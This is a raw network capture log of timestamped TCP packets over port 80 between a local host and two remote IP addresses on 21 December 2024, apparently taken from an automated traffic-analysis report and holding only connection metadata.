                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.096411943 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.096527100 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.096576929 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.097349882 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.097399950 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.097464085 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.097513914 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.098360062 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.098409891 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.098701000 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.098752022 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.099292994 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.099343061 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.099438906 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.099486113 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.100320101 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.100373030 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.100435972 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.100485086 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.101305008 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.101356030 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.101419926 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.101469040 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.102298021 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.102348089 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.102425098 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.102477074 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.103374004 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.103423119 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.103450060 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.103501081 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.104310036 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.104360104 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.104424000 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.104474068 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.244899988 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.244967937 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.245029926 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.245079041 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.245364904 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.245418072 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.245484114 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.245533943 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.246530056 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.246582031 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.246660948 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.246711969 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.247380018 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.247488022 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.247548103 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.247594118 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.248362064 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.248414993 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.248492956 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.248543024 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.249385118 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.249442101 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.249519110 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.249571085 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.250391960 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.250447989 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.250511885 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.250562906 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.251377106 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.251426935 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.251502991 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.251555920 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.252428055 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.252480030 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.252551079 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.252598047 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.253402948 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.253457069 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.253525019 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.253578901 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.254363060 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.254409075 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.254482985 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.254543066 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.255511045 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.255558968 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.255600929 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.255645990 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.256541967 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.256586075 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.256673098 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.256717920 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.257342100 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.257389069 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.257473946 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.257525921 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.258321047 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.258369923 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.258486032 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.258533001 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.259360075 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.259407043 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.259481907 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.259529114 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.260365963 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.260415077 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.260457039 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.260507107 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.261331081 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.261380911 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.261518955 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.261567116 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.262387037 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.262434959 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.262501955 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.262548923 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.263448954 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.263503075 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.263524055 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.263566971 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.264445066 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.264492035 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.264589071 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.264638901 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.265568018 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.265614986 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.265706062 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.265749931 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.266586065 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.266634941 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.266721964 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.266777039 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.267657995 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.267708063 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.267738104 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.267784119 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.268543959 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.268591881 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.268768072 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.268815994 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.269454956 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.269548893 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.269598007 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.270431995 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.270481110 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.270519018 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.270565033 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.271353006 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.271399975 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.271536112 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.271593094 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.272332907 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.272381067 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.272453070 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.272500038 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.273350954 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.273396969 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.273526907 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.273571968 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.274362087 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.274409056 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.274499893 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.274554014 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.275857925 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.275909901 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.275954008 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.275998116 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.276777983 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.276824951 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.276968002 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.277014017 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.277673006 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.277749062 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.277777910 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.277823925 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.278481007 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.278527021 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.278568029 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.278616905 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.279387951 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.279434919 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.279484034 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.279531956 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.280348063 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.280395985 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.280464888 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.280510902 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.281471968 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.281522989 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.281590939 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.281640053 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.282399893 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.282454014 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.282526016 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.282571077 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.283389091 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.283435106 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.283503056 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.283550024 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.284480095 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.284524918 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.284650087 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.284696102 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.285588980 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.285634041 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.285696983 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.285741091 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.286478043 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.286520958 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.286672115 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.286712885 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.287381887 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.287426949 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.287492037 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.287539005 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.288372040 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.288448095 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.288485050 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.288531065 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.289371967 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.289417028 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.289539099 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.289582968 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.290416956 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.290466070 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.290535927 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.290580988 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.291414022 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.291459084 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.291523933 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.291567087 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.292535067 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.292578936 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.292759895 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.292805910 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.293937922 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.293984890 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.294038057 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:14.294085979 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:16.658849955 CET4976480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:16.659265995 CET4978680192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:16.778902054 CET8049786185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:16.778944969 CET8049764185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:16.779093027 CET4976480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:16.779098034 CET4978680192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:16.779278994 CET4978680192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:16.898952007 CET8049786185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:18.114068985 CET8049786185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:18.116305113 CET4978680192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:18.118855953 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:18.119117975 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:18.238817930 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:18.242331982 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:18.242862940 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:18.289522886 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:18.289588928 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:18.362689018 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:19.568140030 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:19.568185091 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:19.568200111 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:19.568223953 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:19.568227053 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:19.568267107 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:19.568382025 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:19.568418980 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:19.568423986 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:19.568455935 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:19.568461895 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:19.568489075 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:19.569024086 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:19.569072008 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:19.569081068 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:19.569116116 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:19.569120884 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:19.569179058 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:19.570014000 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:19.570058107 CET4979180192.168.2.431.41.244.11
